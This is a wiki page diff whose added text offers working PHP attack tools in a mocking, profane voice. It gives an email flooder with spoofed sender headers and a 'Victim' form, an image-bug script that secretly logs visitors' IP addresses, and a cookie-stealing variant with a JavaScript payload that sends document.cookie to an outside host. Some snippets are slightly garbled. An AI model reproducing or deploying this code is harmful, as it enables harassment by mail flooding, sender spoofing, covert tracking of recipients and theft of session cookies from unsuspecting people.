Differences

This shows you the differences between two versions of the page.

--- tools:php [2024/06/03 03:40] – [Simple Backdoor in PHP] Humphrey Boa-Gart
+++ tools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1
@@ Line 1: / Line 1: @@
-{{wst>iw-import}}
+{{wst>iw-cleanup}}
 ====== PHP ======
@@ Line 324: / Line 324: @@
 ==== Email flooder in PHP ====
-===== Image bugs =====
+If you want to just copy this and run it off a server, go ahead. Unfortunately most free PHP hosts don't allow you to send mail, but I guess you can run it off your localhost. You must have access to the sendmail binary on your system to run; it's just a matter of configuring php.ini, which I won't go into now.
-{{tag>Tools Programming Stubs}}
+You need to have:
+. a server 2. basic knowledge of PHP 3. knowledge on how to install/configure your PHP (pop quiz: should register_globals be kept on or off?)
+  <?php
+     $spam= $_POST["spams"];
+  // define number of spam cycles
+     $iloled = $_POST["message"];
+  // this is the message
+     $email = $_POST["email"];
+  // define recipient
+     $rofl = $_POST["body"];
+  // your message
+     function head() {
+        $sender = $_POST["sender"];
+        $header = 'MIME-Version: 1.0 \r\n
+     Content-type: text/html; charset=iso-8859-1 \r\n
+     From: <' . $sender . '>';
+        return($header);
+     }
+  // spoofed header. i found it easier to write it this way.
+     if(isset($_POST["email"])) {
+        for($i = 1; $i <= $spam; $i++){
+           for($ii = 0; $ii <= $_POST["spams"]; $ii++){
+              mail($_POST["email"], $iloled,$rofl,head());
+           } // (the second for loop) defines one cycle
+           echo "Done $i loops of $spam
+  "; //we're done
+        }
+     echo "Complete.";
+     }
+     else {
+   /* if the form isn't filled out show it. also, mess around with this  part any way you like. */
+  ?>
+  <form method="post" action="">
+     Victim: <input type="text" size="28" name="email">
+     Message title: <input type="text" size="28" name="message">
+     Sender (spoof it): <input type="text" size="28" name="sender">
+     Message body: <textarea name="body" cols="28" rows="5"></textarea>
+     Emails per cycle (default 10): <input type="text" size="28" name="spams" value="10">
+     Cycles (default 10):<input type="text" size="28" name="cycles" value="10">
+     <input type="submit" name="submit" value="Click for lulz">
+  </form>
+  <?php
+  }
+  ?>
+===== Image Bugs =====
+Pretty fucking simple, really. You insert the following into an e-mail or something:
+c
+Then in iplulz.php on your server (or whatever you call it), put this code:
+//PROTIP: Make a directory on your server called image.png or any image name, then save the code as index.php in the directory.//
+  <?PHP
+  $the_image = "yourimagehere.jpg";
+  $ip_lister = fopen("ip.list", "a+");
+  fwrite($ip_lister, $_SERVER['REMOTE_ADDR'] . " fell for it lol\n");
+  fclose($ip_lister);
+  if (!strncasecmp(substr($the_image, strlen($the_image) - 4), ".jpg"))
+  $image_mime = "jpeg";
+  else $image_mime = substr($the_image, (strrpos($the_image, '.') + 1));
+  header("Content-Type: image/$image_mime");
+  echo file_get_contents($the_image);
+  ?>
+User gets the image, you get their IP added to a list. EVERYONE WINS
+Also, can steel cookies in dat way:
+  <?PHP
+  $the_image = "yourimagehere.jpg";
+  $ip_lister = fopen("ip.list", "a+");
+  fwrite($ip_lister, $_GET['d0ngz'] . " lol\n");
+  fclose($ip_lister);
+  if (!strncasecmp(substr($the_image, strlen($the_image) - 4), ".jpg"))
+  $image_mime = "jpeg";
+  else $image_mime = substr($the_image, (strrpos($the_image, '.') + 1));
+  header("Content-Type: image/$image_mime");
+  echo file_get_contents($the_image);
+  ?>
+And in email or whatevastuff put
+  <script>
+  document.write("<img src='http://domain.com/index.php?d0ngz="+ document.cookie+"'>
+  ')
+  </script>
+{{tag>Tools Programming}}

User Tools

Site Tools

Differences